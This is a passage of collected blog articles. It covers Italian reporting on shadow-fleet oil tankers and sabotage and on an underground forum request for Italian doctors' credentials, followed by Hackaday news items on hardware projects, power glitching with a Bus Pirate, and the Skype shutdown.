tossici nei nostri mari Ionio e Adriatico dietro uno schema ben preciso di affondamenti. Ma questa é un’altra interessante storia.

Fonte immagine: Nautica Report, Le navi dei veleni: più di trenta le navi affondate nei fondali.

Le vendite di petrolio russo secondo quanto evidenziato da Andriy Klymenko, capo del gruppo di monitoraggio del Black Sea Institute for Strategic Studies, non sono diminuite a causa delle sanzioni dell’Unione Europea, ma “in seguito agli attacchi con droni a lungo raggio delle forze armate ucraine sul principale porto di esportazione russo di Ust’-Luga”. Questo ha portato le navi ad utilizzare un altro porto ‘Primorsk’, nella regione di San Pietroburgo”. Tuttavia Klymenco ha fatto notare che “un terzo del volume di petrolio greggio russo proveniente dai porti del Mar Baltico viene trasportato in tutto il mondo da petroliere provenienti dai paesi dell’UE e della NATO. Naturalmente non lo trasportano in Europa, ma in India, Turchia e Cina. Conosciamo ogni petroliera, i suoi proprietari, fino all’indirizzo dell’ufficio dell’armatore. Si tratta di cinque note aziende greche, di proprietà di miliardari greci”. Dopo le compagnie greche ci sono quelle della Federazione russa, e altre registrate negli Emirati Arabi Uniti, a Dubai. “Non è un segreto che 1.500 aziende russe abbiano nuovamente registrato la propria sede a Dubai”. Poi ci sono le navi registrate in Azerbaigian: “14 petroliere appartenevano a società registrate in questo paese, 9 in Cina, principalmente a Hong Kong, 9 in India, 8 in Turchia, 3 in Vietnam e 1 in Kazakistan”.

Azerbaigian, Cina, Turchia, Vietnam, Kazakistan possiedono molte navi che hanno più di 15 anni, se uscisse un regolamento che stabilisse che non possono essere più usate, “queste uscirebbero immediatamente dal gioco”.

Sempre secondo Klymenko solo una petroliera su 96 potrebbe essere considerata una petroliera della “flotta fantasma”, perché era immatricolata in uno dei cosiddetti paesi con “bandiera di comodo”. “Si tratta semplicemente di giurisdizioni offshore. In genere ce ne sono da 6 a 9 su 100”. Molte non vengono registrate insieme ai volumi reali secondo Klymenco “gli occidentali utilizzano l’intelligenza artificiale, per elaborare tutte le informazioni,[…] probabilmente sono ancora in tempi di pace, non tengono conto dell’impatto della guerra elettronica russa sulle prestazioni di questi sistemi di informazione marittima, perché distorce i segnali o li nasconde”. Poi ci sono anche i casi in cui l’equipaggio della petroliera disattiva il sistema di allerta precoce, impedendo così la registrazione del porto di partenza. Infine per Klymenko non esistono sanzioni sul petrolio e sui prodotti petroliferi russi. “C’è un embargo: i paesi da cui arrivano le sanzioni semplicemente si rifiutano di acquistare petrolio oltre al tetto massimo, un formato impossibile da rispettare, perchè non esiste alcun meccanismo di verifica. L’India, ad esempio, non ha promesso nulla a nessuno.

Caratteristiche e tendenze specifiche delle navi ombra

Per eludere sanzioni, regolamenti e controlli le ‘flotte ombra’ sono solitamente coinvolte nel trasporto di petrolio o altre materie prime per vari paesi e si distinguono dalle petroliere convenzionali per una serie di caratteristiche e tendenze specifiche tra cui:

• la data della costruzione (15 anni o anche più), spesso anche caratterizzate da una cattiva manutenzione,
• la proprietà offuscata o anonima (utilizzo dei “registri aperti”, che consentono alle navi di essere registrate in paesi senza alcun collegamento con il proprietario o il suo paese di origine,
• stesso numero IMO ma nome modificato (cambio di nome o di registrazione frequente),
• oscuramento IMO,
• bandiere di comodo e cambio frequente di bandiera (es.Panama, Malta, Liberia, Comore, Isole Marshall), che rappresentano il 40% della capacità di trasporto mondiale.
• navigazione di rotte di spedizione complesse,
• l’elusione o la manipolazione dei segnali di identificazione automatica (AIS) per evitare o rendere complesso il tracciamento e il monitoraggio (spegnimento del segnale gps prima di attraccare al porto),
• utilizzo di trasferimenti nave/nave (STS) – es. petrolio tra navi – per oscurare la destinazione del carico,
• navigazione con rotte insolite o complesse per rendere difficile l’individuazione
• possibile mancanza di assicurazione,
• transazioni non trasparenti dei pagamenti del carico,
• documenti di carico falsi o manipolati per mascherare origine o destinazione del carico.

Inoltre il numero IMO (univoco e di 7 cifre) di una nave – e collegato in modo visibile al suo scafo – è destinato a essere permanente indipendentemente da un cambio di proprietà o nome della nave ed è separato e diverso dal numero ufficiale rilasciato dall’amministrazione di bandiera della nave che è utilizzato solo internamente: le navi ‘ombra’ hanno spesso dipinto sopra i nomi delle navi e i numeri IMO per oscurare la propria identità e spacciarsi per navi diverse.

Fonte immagine: Clarksons Tanker Register, 2023., le dimensioni della flotta di petroliere al 2023.

Bisogna notare inoltre che i tre stati di bandiera più grandi per tonnellate di portata lorda sono: Liberia, Isole Marshall e Panama e tutti e tre hanno tutti un’affiliazione storica con gli Stati Uniti e hanno un patto di condivisione delle informazioni se sospettano che una petroliera stia partecipando al commercio di petrolio sanzionato per impedire a queste petroliere di fare “flag shopping”. Secondo un report del 2024 del Congressional Reserve Service “I registri di Liberia, Isole Marshall, Panama, Bahamas e Honduras sono le uniche navi battenti bandiera straniera che ricevono un’idoneità speciale per la copertura assicurativa contro i rischi di guerra fornita dal governo degli Stati Uniti”. Bandiere invece come quelle di Gabon, Palau e le Isole Cook, sono state spesso sanzionate per cui vengono il più delle volte evitate. La scelta tocca poi le transazioni delle “banche che scambiano i fondi tra gli acquirenti e i venditori di petrolio, le banche infatti devono confermare che la nave soddisfi gli standard di classificazione”.

Fonte immagine: Marine Traffic

Molte delle navi sanzionate vengono inserite in liste grigie a causa di irregolarità per: problemi al motore, agli ammortizzatori, al cruscotto, a taluni equipaggiamenti, ect. Se queste irregolarità si sommano invece finiscono nelle liste nere, ovvero di petroliere che necessitano il più delle volte di riparazioni immediate.

La posizione strategica dell’Italia

La posizione strategica dell’Italia, al centro del Mediterraneo, la rende un punto di transito chiave per le spedizioni di petrolio in Europa, Nord Africa e Medio Oriente e inoltre è relativamente vicina a Paesi come Libia (punto caldo di commercio illegale), Siria e Iran (in particolare trasferimenti STS), che sono spesso coinvolti in operazioni di flotta oscura a causa delle sanzioni internazionali. La domanda di petrolio a basso costo è una delle origini del mercato delle flotte ombra e la natura segreta ed evasiva di queste operazioni rende difficile sradicarle. L’Italia collabora strettamente con l’Unione Europea e la NATO per monitorare e contrastare l’attività della Dark Fleet nel Mediterraneo e ciò include la condivisione di intelligence e la conduzione di pattugliamenti congiunti. Nel 2020, ad esempio, una petroliera che trasportava petrolio libico è stata trattenuta in Sicilia con l’accusa di aver violato le sanzioni dell’UE.

Difficili da arrestare

Queste pratiche sono state evidenziate ad esempio nel gennaio 2024 relativamente all’identificazione tramite tecnologia satellitare di 383 vascelli, di cui 189 con bandiera panamense che trafficavano petrolio iraniano, parte di una ‘flotta fantasma’, di cui il Senato US ha richiesto l’immediato controllo all’autorità marittima di Panama.

Sempre riguardo il petrolio irarniano sono emerse informazioni importanti da una serie di oltre 10.000 e-mail da un leak di Sahara Thunder, società di facciata iraniana – che spedisce merci per conto del MODAFL – Ministero della difesa e della logistica delle forze armate – a più giurisdizioni, tra cui la Repubblica Popolare Cinese (RPC), la Russia e il Venezuela – che descrivono il suo commercio di petrolio dal marzo 2022 al febbraio 2024. le reti di evasione delle sanzioni occidentali, la flotta di navi, le operazioni di vendita di petrolio, i processi di rigassificazione, le figure chiave all’interno dell’azienda e il loro commercio di armi con la Russia, nonché porterebbero prove dei legami di Sahara Thunder con le attività del MODAFL. Così la Sahara Thunder ha stipulato contratti di noleggio a tempo con Zen Shipping & Port India Private Limited con sede in India per la nave battente bandiera delle Isole Cook CHEM (IMO 9240914), operata da Safe Seas Ship Management FZE con sede negli Emirati Arabi Uniti che gestisce anche la DANCY DYNAMIC (9158161) con bandiera di Palau, la K M A (9234616) con bandiera delle Isole Cook e la CONRAD (9546722) con bandiera delle Isole Cook, tra le altre.

Allo stesso modo seguendo la stessa logica dei movimenti di petrolio iraniano possiamo farlo per la flotta ombra che trasporta merci per conto della Russia. Analizziamo quindi alcune delle navi che riportano comuni caratteristiche, tra cui proprio la SeaJewel messe in correlazione con i recenti incidenti e manomissioni subiti.

In ultimo analizzando uno dei porti di attracco della SeaJewel c’è un’altra storia che emerge, al porto di Costanta (Romania) sul Mar Nero, per capire che queste pratiche avvengono da anni e sono aumentate dopo lo scoppio del conflitto russo-ucraino.

Nel 2023, viene riportato da context.ro, un imprenditore rumeno, Gheorghe Bosînceanu – che appariva nei Paradise Papers come beneficiario dei servizi di Appleby, un fornitore internazionale di servizi legali offshore e che aveva già avuto una controversa transazione nel 2002 con il governo rumeno riguardo un cantiere navale – controllava una flotta dietro un labirinto di società registrate in giurisdizioni offshore per trasportare petrolio russo. Il suo nome è emerso dietro una società quotata in borsa (Histria Management) a cui appartiene la flotta navale, registrata in un paradiso fiscale e le cui navi petrolifere operavano dal porto di Costannte in Romania, trasportando petrolio russo verso l’Europa e soprattutto verso la Turchia.

La scoperta è avvenuta dopo l’indagine internazionale, “Fueling the war” , che ha rivelato che un’entità rumena era inclusa in una lista di aziende che trasportavano petrolio russo dopo le sanzioni a Mosca. Ma nella lista non compare solo la società rumena, bensi parecchie società dislocate in altri paesi europei. I dati analizzati da Investigate Europe riferibili al 2022 mostrano che la maggior parte delle spedizioni dai porti russi sono state effettuate da navi di proprietà di società di Grecia, Cina ed Emirati Arabi Uniti. “In termini di capacità di carico” evidenzia Context “le società greche Tms Tankers Ltd e Minerva Marine Inc, insieme a Scf Management Services Dubai, sono le prime tre compagnie russe di combustibili fossili dall’inizio della guerra”. Le sanzioni – contro Venezuela, Iran e Russia – hanno reso necessari viaggi medi più lunghi per il petrolio trasportato via mare, nel caso del petrolio russo e della sua flotta ombra, la dimensione preferita è Aframax (vd. Seajewel) e per questo tipo di petroliere i prezzi nel 2022 erano quasi triplicati rispetto agli anni precedenti.

Altre navi sanzionate fanno parte delle black list registrate nel Mar Baltico per la limitazione del traffico petrolifero russo a Dicembre 2022, 167 navi di cui la maggior parte (126) registrate in Grecia, Seychelles, Turchia, Cina, Marshall Islands.

I sabotaggi di Seajewel, Seacharm, Grace Ferrum e Suezmax, guerra commerciale, mine nei mari o “controlli più rigorosi”?

Tra il 17 e il 18 gennaio 2025 la Seacharm (IMO:9773765) subisce un’esplosione mentre naviga al largo del porto turco di Ceyhan, naviga poi verso la Grecia, probabilmente diretta al cantiere dove rimane circa 10 giorni, presso i cantieri navali di Skaramangas, dove è stata sottoposta a riparazioni dal 20 al 30 gennaio, sino a fine gennaio secondo Lloyd Intelligence.

Da lì naviga verso la Libia, dove preleva un carico e risulta poi essere a Savona insieme alla Seajewel (IMO: 9388807) che subisce due esplosioni a scoppio ritardato.Entrambe le navi sono gestite da Themaris: il punto in comune si trova al terminal di Novorossiysk, in Russia. Ma Themaris si trova in buona compagnia: sempre in febbraio ad essere stata presa di mira è stata la petroliera russa Suezmax (IMO: 9234642) nel porto baltico russo di Ust-Luga. La Grace Ferrum (IMO: 9667928) – proprietà elencata da Equasis come tramite Grace Ferrum Shipping in Liberia, con la gestione ISM da Cymare Navigation negli Emirati Arabi Uniti – invece ha subito esplosioni al largo della costa libica sempre all’inizio di febbraio: proveniva dai porti di San Pietroburgo e Ust-Luga. Cosa unisce questi vascelli? TradeWinds nel 2023 aveva riferito che la Grace Ferrum era stata acquisita da Grace Energy, fondata dall’armatore poco conosciuto Stanislav Raspopov – ‘ex analista commerciale e agente marittimo del gruppo Navig8 che aveva fondato la società ad Atene e Dubai per controllare una flotta di petroliere MR rapidamente accumulata. Documenti depositati presso la Companies House del Regno Unito mostrano che Raspopov era un cittadino russo prima di diventare cittadino greco residente a Londra nel 2022. Grace Energy – sempre secondo TradeWinds – rispetta sempre le normative occidentali sulle spedizioni di petrolio, incluso il tetto massimo del prezzo del petrolio russo.

Si tratta di una guerra commerciale o di una conseguenza di un “controllo più rigoroso delle operazioni marittime?”. Entrambe le ipotesi, da quanto abbiamo analizzato sin qui, sembrano possibili, tuttavia vi sono speculazioni che si tratti di operazioni di sabotaggio sostenute dall’Ucraina. La società di intelligence Ambrey Analytics ha affermato che non tutti gli obiettivi sono stati designati nell’ambito di programmi di sanzioni, ma i rischi attualmente sono “valutati come sostanziali”. Questi incidenti sono i primi che coinvolgono navi non militari nella regione da tempo, tempi in cui le navi erano vulnerabili a causa delle “mine piazzate nel Mar Baltico, nel Mare del Nord, nel Mediterraneo e nel Mar Nero”impiegate nella guerra marittima.

Relativamente alla questione è un articolo su MarketScreener che parla di mine a mignatta (di tipo BPM 1 o BPM 2) o mine a patella che vengono “attaccate alle navi con dei magneti e di solito contengono esplosivi TNT (trinitrotoluene) che vengono attivati con un timer, ha detto una delle fonti”.

Approfondendo, sempre secondo Lloyd Intelligence le navi della Thenmaris navigano nella legalità, oltre al fatto che “rimane del tutto legittimo trasportare greggio russo fintanto che rispetta il tetto massimo di prezzo di 60 $ al barile. È anche consentito sollevare greggio prodotto da ex costituenti dell’Unione Sovietica, come il Kazakistan, che spesso vengono ancora gestiti nei terminal russi”. Infatti la Seajewel ha fatto sì scalo in Russia l’anno scorso, ma si sarebbe trattato dl sollevamento della miscela di greggio CPC kazako dal Black Sea Caspian Pipeline Consortium.

Questo è il tipo di operazioni del tutto legali ed etiche intraprese da Thenamaris (aframax) che se anche ‘operando regolarmente’ è stata inserita in un lista di cinque compagnie di navigazione greche nell’elenco degli “sponsor di guerra internazionali” dall’Agenzia nazionale per la prevenzione della corruzione ucraina (NACP), con le accuse di trasportare “petrolio e prodotti petroliferi russi, alimentando così il bilancio dello Stato terrorista e finanziando l’aggressione russa”.

Nella lista si trovanola Minerva Marine, la Thenamaris, la TMS Tankers a cui si aggiunge la Dynacom Tankers Management Ltd.

Il 30% delle petroliere – sottolinea Klymenko – che servono alle esigenze del complesso militare-industriale russo batte bandiera greca ogni mese.

La grande vendita di navi greche allo scoppio del conflitto russo-ucraino

TradeWinds ha inoltre rilevato che con lo scoppio della guerra ucraina e l’aumento delle tariffe del trasporto che c’è stata una “grande vendita di navi greche” ma anche aziende statunitensi e norvegesi ne hanno beneficiato, ma le navi greche, secondo l’economista capo dell’Institute of International Finance, Robin Brooks, rappresentano attualmente quasi il 50 percento della capacità delle petroliere in uscita dai porti russi, rispetto al 33 percento prima della guerra russo-ucraina ma bisogna ripeterlo: “rimane del tutto legittimo trasportare greggio russo fintanto che rispetta il tetto massimo di prezzo di 60 $ al barile”. Il boom di vendite – di vecchie petroliere – si rileva nel febbraio del 2022, data dalla quale sono state vendute circa 125 petroliere di armatori greci per un valore di 4 miliardi di dollari, vendite che sono proseguite poi nel 2023. Particolarmente cercate sono le petroliere Suezmax e Aframax: il terzo e il quarto tipo più grande di petroliere per il greggio e con dimensioni perfette per lo spostamento di carichi russi. La stessa Thenamaris ha venduto la petroliera Aframax Seatrust (IMO:9979993) – cifra stimata di 35 milioni di dollari – ma come succede per tutte queste navi, il nome del nuovo proprietario rimane oscurato. Tuttavia tra gli acquirenti secondo ForeignPolicy troviamo Emirati Arabi Uniti, Cina, Turchia (tra cui la BEKS Ship Management & Trading) e India.

Così gli armatori greci in una frenesia di vendite si sono sbarazzati delle vecchie navi potendo cosi rinnovare la loro flotta, spesso con navi più piccole.

Thenamaris è recentemente emerso come il nuovo proprietario della petroliera da 108.500 dwt Southern Rouse (rinominata Sealoyalty (IMO:9783928), costruita nel 2018), un’ex nave di proprietà di Nissen Kaiun che, secondo quanto riferito, ha cambiato proprietario nel dicembre 2022.

Fonte immagine: app.maritimeoptima.com/, Sealoyalty, ultima rotta.

Cui prodest

E quando quel mondo finiva con le colonne d’Ercole ad ovest e con i giardini di Babilonia ad est, i nomi di antichi navigatori come Annone, Himilco, Nearco, Arriano, Plinio, e delle loro vicende, erano già leggenda. _ Antichi navigatori verso le Indie e le antiche colonne d’Ercole.

Alla domanda di chi trarrebbe vantaggio dei sabotaggi avvenuti in questi mesi a diverse petroliere, vi sono diverse risposte molte delle quali ancora speculative, senza prove verificate. Le motivazioni possono essere geopolitiche, economiche o strategiche e vanno da stati che trarrebbero vantaggio da un’interruzione delle vie energetiche del Mediterraneo o delle esportazioni di petrolio rivali sino ad organizzazioni criminali che operano nel mercato nero. Secondariamente i progetti di gas del Mediterraneo orientale – che abbiamo visto prima – potrebbero trarre vantaggio dagli incidenti per accelerare le importazioni di gas o i progetti delle pipeline in corso. In modo molto minore invece gli incidenti avrebbero come obiettivo l’aumento dei premi per l’assicurazione marittima e della domanda di scorte navali private, anche se i traders traggono sempre vantaggio dal panico per trarre i loro profitti.

Abbamo constatato che le esportazioni in oggetto risultano quantomeno “legali” ma il loro sabotaggio potrebbe sia avere l’obiettivo di monopolizzarne il commercio di un poteziale mercato nero, sia essere la conseguenza di operazioni volte a fermare il commercio di pertrolio russo da parte di compagnie greche. Infine più vicino alla narrazione cinematografica ma senza Brad Pitt (L’esercito delle 12 scimmie) sono gli attivisti ma è molto improbabile che causino esplosioni e comunque i fenomeni di ecoterrorismo sono in lento e costante declino in tutto il mondo.

La Grecia come abbiamo visto rimane un attore importante nel transito di risorse energetiche nel Mediterrano, sabotare le sue navi destabilizza in qualche modo il mercato, facendo pressione sull’Europa, nelle controversie sui confini marittimi e sui diritti sugli idrocarburi e le tensioni con la Turchia su Cipro e Creta. Al largo della Libia invece le riserve di petrolio e gas offshore sono contese da fazioni rivali (ad esempio, il Governo di accordo nazionale sostenuto dalla Turchia contro l’Esercito nazionale libico sostenuto da Russia/Egitto/EAU). I sottomarini in questa zona – es. Krasnodar – che monitorano le acque libiche possono raccogliere informazioni, proteggere le infrastrutture energetiche o consentire operazioni segrete per controllare le risorse ma anche monitorare le spedizioni di armi alle fazioni (violando gli embarghi delle Nazioni Unite) o ancora dispiegare droni o sommozzatori sottomarini per manomettere cavi o petroliere.

Infine tutti questi incidenti che ho elencato lungo l’articolo, provocano il caos e riflettono un moderno campo di battaglia in cui convergono energia, dati e potenza navale. Il Mediterraneo è diventato un teatro per un conflitto ibrido, non dimenticando che anche la Libia è al centro.

Bibliografia

• atlanticcouncil.org/blogs/turk…
• crisisgroup.org/europe-central…
• depa-int.gr/en/interconnector-…
• greenpeace.org/italy/storia/17…
• grassley.senate.gov/imo/media/…
• ​​reuters.com/graphics/IRAN-OIL/…
• home.treasury.gov/news/press-r… (Treasury Targets Networks Facilitating Illicit Trade and UAV Transfers on Behalf of Iranian Military, Aprile 2025)
• greenpeace.org/italy/storia/17…
• lawfaremedia.org/article/whats…
• context.ro/a-romanian-milliona…
• investigate-europe.eu/en/posts…
• feem.it/ricerca/progetti/the-f…
• iiss.org/publications/strategi…
• irpimedia.irpi.eu/adriaticocri…
• nauticareport.it/dettnews/stor…
• itamilradar.com/2025/02/15/mon…
• crsreports.congress.gov/produc…
• foreignpolicy.com/2023/09/11/g…
• perma.cc/YXS8-ACXT
• maritime-executive.com/article…
• documenti.camera.it/_dati/leg1… news.usni.org/2025/01/22/u-k-s…
• blackseanews.net/en/read/22801…
• it.marketscreener.com/notizie/…

L'articolo Il gioco del gatto e del topo tra sabotaggi di petroliere e cavi sottomarini proviene da il blog della sicurezza informatica.

For the maker looking to turn their project into a business, trying to price your widget can be a bit of a conundrum. You want to share your widget with the world without going broke in the process. What if you could achieve both, letting the end user finish assembly?

[PDF]While over a decade has passed since Harvard Business School released this study on what they dub “The IKEA Effect,” we suspect that most of it will still be relevant given the slow pace of human behavior change. In short, when you make someone become part of the process of manufacturing or assembling their stuff, it makes them value it more highly than if it was already all put together in the box.

Interestingly, the researchers found “that consumers believe that their self-made products rival those of experts,” and that this is true regardless of whether these people consider themselves to be DIY enthusiasts or not. This only holds if the person is successful though, so it’s critical to have good instructions. If you have a mass market item in the works, you probably don’t want to require someone with no experience to solder something, but as IKEA has shown, nearly anybody can handle some hex screws and Allen wrenches.

If you’re looking for more advice on how to get your invention in people’s hands, how about this Supercon talk by Carrie Sundra about manufacturing on a shoestring budget or this video from Simone Giertz on her experiences with manufacturing from idea to finished product. You might want to steer clear of people promising patents for pennies on commercials, though.

hackaday.com/2025/03/02/some-a…

Spesso parliamo di “dati sanitari” e dell’interesse dei criminali informatici a queste preziose informazioni, sulle quali abbiamo scritto anche specifici articoli sul tema. Un recente annuncio pubblicato su un forum underground in lingua russa mette in luce una delle pratiche più diffuse e pericolose: la richiesta di database o log contenenti informazioni sui medici italiani.

Questo tipo di dati, se finisse nelle mani sbagliate, potrebbe essere utilizzato per una vasta gamma di attività criminali, tra cui frodi, ricatti e accessi non autorizzati ai sistemi sanitari.
Ciao a tutti, ho urgente bisogno di qualcuno che mi possa procurare i registri dei medici italiani per il portale medico2000/medicoTS/ricettaTS. pagherò cifre elevate per singoli tronchi, fintanto che funzioneranno.

E' necessario utilizzare il deposito a garanzia, ovviamente.

se hai qualcosa di simile o altre domande su ciò di cui ho bisogno in modo specifico puoi mandarmi un messaggio privato o contattarmi @T*******

grazie *****

Come funziona il mercato nero delle informazioni?

I forum underground e i marketplace del dark web fungono da punto di incontro tra domanda e offerta di dati sensibili. Qui, hacker, truffatori e cybercriminali possono acquistare informazioni preziose come credenziali di accesso, dati sanitari, numeri di carte di credito e molto altro. I prezzi variano in base alla qualità e alla rarità delle informazioni: più un dato è esclusivo e aggiornato, maggiore sarà il suo valore.

A cosa servono questi dati?

Le informazioni sottratte possono essere sfruttate in vari modi:

• Frodi sanitarie: Accesso ai portali medici per prescrivere farmaci illeciti, ottenere rimborsi o falsificare diagnosi.
• Attacchi mirati: Utilizzo delle credenziali per accedere a reti ospedaliere e diffondere ransomware.
• Furto di identità: Creazione di identità fittizie per ottenere prestiti o altre forme di credito.
• Ricatti e doxxing: Minaccia di divulgare informazioni private in cambio di un pagamento.

La minaccia della rivendita dei dati

Uno degli aspetti più preoccupanti di questo traffico illecito è la possibilità che i dati rubati vengano rivenduti più volte. Un hacker potrebbe vendere lo stesso set di credenziali a più acquirenti, moltiplicando il rischio per le vittime. Inoltre, le informazioni raccolte vengono spesso utilizzate per compiere attacchi più sofisticati, come spear phishing o campagne di ingegneria sociale, mettendo a rischio non solo i singoli individui ma anche intere istituzioni.

Come proteggersi?

Per contrastare il fenomeno del cybercrime e la vendita di dati sensibili, è essenziale adottare misure di sicurezza adeguate:

• Utilizzare autenticazione a più fattori (MFA) per proteggere gli account.
• Monitorare le attività sospette sui propri account e segnalare eventuali anomalie.
• Evitare di riutilizzare le stesse credenziali su più servizi.
• Diffondere consapevolezza tra i professionisti del settore sanitario sull’importanza della cybersecurity.

La richiesta di database di medici italiani evidenzia ancora una volta quanto sia elevata la domanda di dati sensibili nei mercati underground. Proteggere le proprie informazioni e quelle dei pazienti non è mai stato così cruciale. La cybersecurity non è solo una questione tecnica, ma una responsabilità collettiva.

L'articolo Italia e Ospedali nel mirino degli hacker: il business segreto dei dati sanitari rubati proviene da il blog della sicurezza informatica.

In a move that could have been seen coming from at least a decade away, Microsoft has confirmed that the Skype service will be shutting down on May 5. This comes after an intrepid person stumbled over a curious string in the latest Skype for Windows preview. This string seemed intended to notify the user about the impending shutdown, telling them to migrate to Teams instead.

Skype was originally created in 2003 by a group of European developers, where it saw some success, with the service being acquired by Microsoft in 2011. Much like other messaging services, each Skype user has a unique ID, but there is also integration with phone services around the world. When Microsoft overhauled the user interface in 2017, this caused a split between ‘classic’ UI fans and the heretics who liked the new interface.

With Microsoft not really finding a way to stop the bleeding of users by this time, and with its nascent Teams service enjoying success despite any complaints anyone might have about it, it seems that now the time has come where Skype will be put out to pasture. For the handful of Skype users still left today, the options are to either download your data before it’s erased, or to move your user account to Teams.

hackaday.com/2025/03/02/skype-…

In today’s “futuristic tech you can get for $5”, [RealCorebb] shows us a gesture sensor, one of the sci-fi kind. He was doing a desktop clock build, and wanted to add gesture control to it – without any holes that a typical optical sensor needs. After some searching, he’s found Microchip’s MGC3130, a gesture sensing chip that works with “E-fields”, more precise than the usual ones, almost as cheap, and with a lovely twist.

The coolest part about this chip is that it needs no case openings. The 3130 can work even behind obstructions like a 3D-printed case. You do need a PCB the size of a laptop touchpad, however — unlike the optical sensors easy to find from the usual online marketplaces. Still, if you have a spot, this is a perfect gesture-sensing solution. [RealCorebb] shows it off to us in the demo video.

This PCB design is available as gerbers+bom+schematic PDF. You can still order one from the files in the repo. Also, you need to use Microchip’s tools to program your preferred gestures into the chip. Still, it pays off, thanks to the chip’s reasonably low price and on-chip gesture processing. And, [RealCorebb] provides all the explanations you could need, has Arduino examples for us, links all the software, and even provides some Python scripts! Touch-sensitive technology has been getting more and more steam in hacker circles – for instance, check out this open-source 3D-printed trackpad.

youtube.com/embed/Or8UPq3nDdc?…

hackaday.com/2025/03/01/this-g…

Typically, if you’re shooting 35 mm film, you’re using it in an old point-and-shoot or maybe a nice SLR. You might even make some sizeable prints if you take a particularly good shot. But you can get altogether weirder with 35 mm if you like, as [Socialmocracy] demonstrates with his “extreme sprocket hole photography” project (via Petapixel).

The concept is simple enough. [Socialmocracy] wanted to expose four entire rolls of 35 mm film all at the same time in one single shot. To be absolutely clear, we’re not talking about exposing a frame on each of four rolls at once. We’re talking about a single exposure covering the entire length of all four films, stacked one on top of the other.

To achieve this, an old-school Cirkut No.6 Outfit camera was pressed into service. It’s a large format camera, originally intended for shooting panoramas. As the camera rotated around under the drive of a clockwork motor, it would spool out more film to capture an image.

[Socialmocracy] outfitted the 100-year-old camera with a custom 3D-printed spool that could handle four rolls of film at once, rather than its usual wide single sheet of large format film. This let the camera shoot its characteristic panoramas, albeit spread out over multiple rolls of film, covering the sprocket holes and all. Hence the name—”extreme sprocket hole photography.”

It’s a neat build, and one that lets [Socialmocracy] use more readily available film to shoot fun panoramas with this old rig. We’ve featured some other great film camera hacks over the years, too, like this self-pack Polaroid-style film. Video after the break.

youtube.com/embed/0RYM8ldqwiU?…

[Thanks to naMretupmoC for the tip!]

hackaday.com/2025/03/01/using-…

Own a Bus Pirate 5? Now, it can do power glitching, thanks to [Matt Brugman’s] demo and contributions to the stock code. This is also a great demo of Bus Pirate’s capabilities and programmability! All you need is the Bus Pirate and a generic Arduino – load a glitch-vulnerable code example into the Arduino, get yourself a generic FET-based glitching setup, and you too can play.

The Arduino board outputs data over UART, and that’s used as a trigger for the Bus Pirate’s new glitch feature – now mainline, thanks to [Matt]’s pull request. It’s pretty feature-complete, too — all parameters are configurable, it can vary the glitching interval, as one would want, and the code checks for success conditions so that it can retry glitching automatically.

In this demo, it only took six consecutive attempts to successfully glitch the ATMega328P – wouldn’t you know it, the code that got glitched was pulled almost wholesale from an IoT device. Glitching remains an underappreciated vector for reverse-engineering, and there’s really no shortage of hacks it allows you to do – get yourself a FET, a Bus Pirate, or maybe just an ESP8266, and join the glitching-aware hackers club!

Want to know more about the Bus Pirate 5? Check out our hands-on review of the hacker multi-tool from last year.

hackaday.com/2025/03/01/the-bu…

The early 2000s were the halcyon days of physical media. While not as svelte as MP3 players became, why are those early 2000s machines smaller than all the new models popping up amidst the retro audio craze?

We’ve bemoaned the end of the electromechanical era before, and the Verge recently interviewed the people at We Are Rewind and Filo to get the skinny on just why these newer cassette and CD players aren’t as small as their predecessors. It turns out that all currently produced cassette players use the same mechanism with some small tweaks in materials (like metal flywheels in these higher quality models) because the engineering required to design a smaller and better sounding alternative isn’t warranted by the niche nature of the cassette resurgence.

A similar fate has befallen the laser head of CD mechanisms, which is why we don’t have those smooth, rounded players anymore. Economies of scale in the early 2000s mean that even a cheap player from that era can outperform a lot of the newer ones, although you won’t have newer features like Bluetooth to scandalize your audiophile friends. A new Minidisc player is certainly out of the question, although production of discs only ended this February.

If you’re looking to get back into cassettes, this masterclass is a good place to start. If you don’t fancy any of the players the Verge looked at, how about rolling your own incarnation with the guts from a vintage machine or just going for the aesthetic if cassettes aren’t your jam?

youtube.com/embed/2DWtkSVNvTg?…

hackaday.com/2025/03/01/why-ar…

[Chris] had an idea. When playing VR games like BeatSaber, he realized that spectators without headsets weren’t very included in the action. He wanted to create some environmental lighting that would make everyone feel more a part of the action. He’s taken the first steps towards that goal, interfacing SteamVR controllers with addressable LEDs.

Armed with Python, OpenVR, and some help from ChatGPT, [Chris] got to work. He was soon able to create a mapping utility that let him create a virtual representation of where his WLED-controlled LED strips were installed in the real world. Once everything was mapped out, he was able to set things up so that pointing the controller to a given location would light the corresponding LED strips. Wave at the windows, the strips on that wall light up. Wave towards the other wall, the same thing happens.

Right now, the project is just a proof of concept. [Chris] has enabled basic interactivity with the controllers and lights, he just hasn’t fully built it out or gamified it yet. The big question is obvious, though—can you use this setup while actually playing a game?

“I just found the OpenVR function/object that allows it to act as an overlay, meaning it can function while other games are working,” [Chris] told me. “My longer term goals would be trying to interface more with a game directly such as BeatSaber, and the light in the room would correspond with the game environment.”

We can’t wait to see where this goes next. We fully expect flashy LED room setups to become the norm at VR cafes hosting BeatSaber competitions in future. We’ve featured plenty of other coverage of VR lately, too.

youtube.com/embed/jRTiu2mgVi0?…

hackaday.com/2025/03/01/steamv…

This week, I had to do something I haven’t done in a long, long time: make myself a custom PCB the old-fashioned way, with laser toner and etchant. The reason? I bought a horrible K40 laser cutter, and the motion controller doesn’t seem to be able to do acceleration control, which means the machine rams full speed into and out of 90 degree corners, for instance. It sounds awful, and it dramatically limits how fast the laser cutter can run.

The plan, then, is to use a controller based on the wonderful FluidNC, but that meant making an adapter board for the flat-flex cable that connects to the X carriage, and the connector has 2 mm pin spacings instead of the usual 2.54 mm, and it just doesn’t fit into any prototyping boards that I have lying around. Besides, a custom PCB adapter board just looks neater.

I wasn’t confident that I could align and drill the dozen small holes for the flat-flex connector; they didn’t have much extra space around them for the copper pads. These holes had to be dead on, or risk ripping them up. And this is where I heard the voice of my old Jedi master.

When you have a tricky operation coming up that requires more precision than you’re immediately comfortable with, you can practice on the other parts of the project that don’t demand that much precision. Pretending that they do, and taking all the care that you can, gets you in shape to tackle the truly critical bits, and if you mess up a little on the easy stuff, it’s not a problem. I had more than a few pin-headers and other random holes to drill for practice anyway.

Now of course, you could always be giving all of your projects 100% all of the time, if time is never of the essence and effort is free. In the real world, you don’t always want to work at maximum precision. Good enough is often good enough.

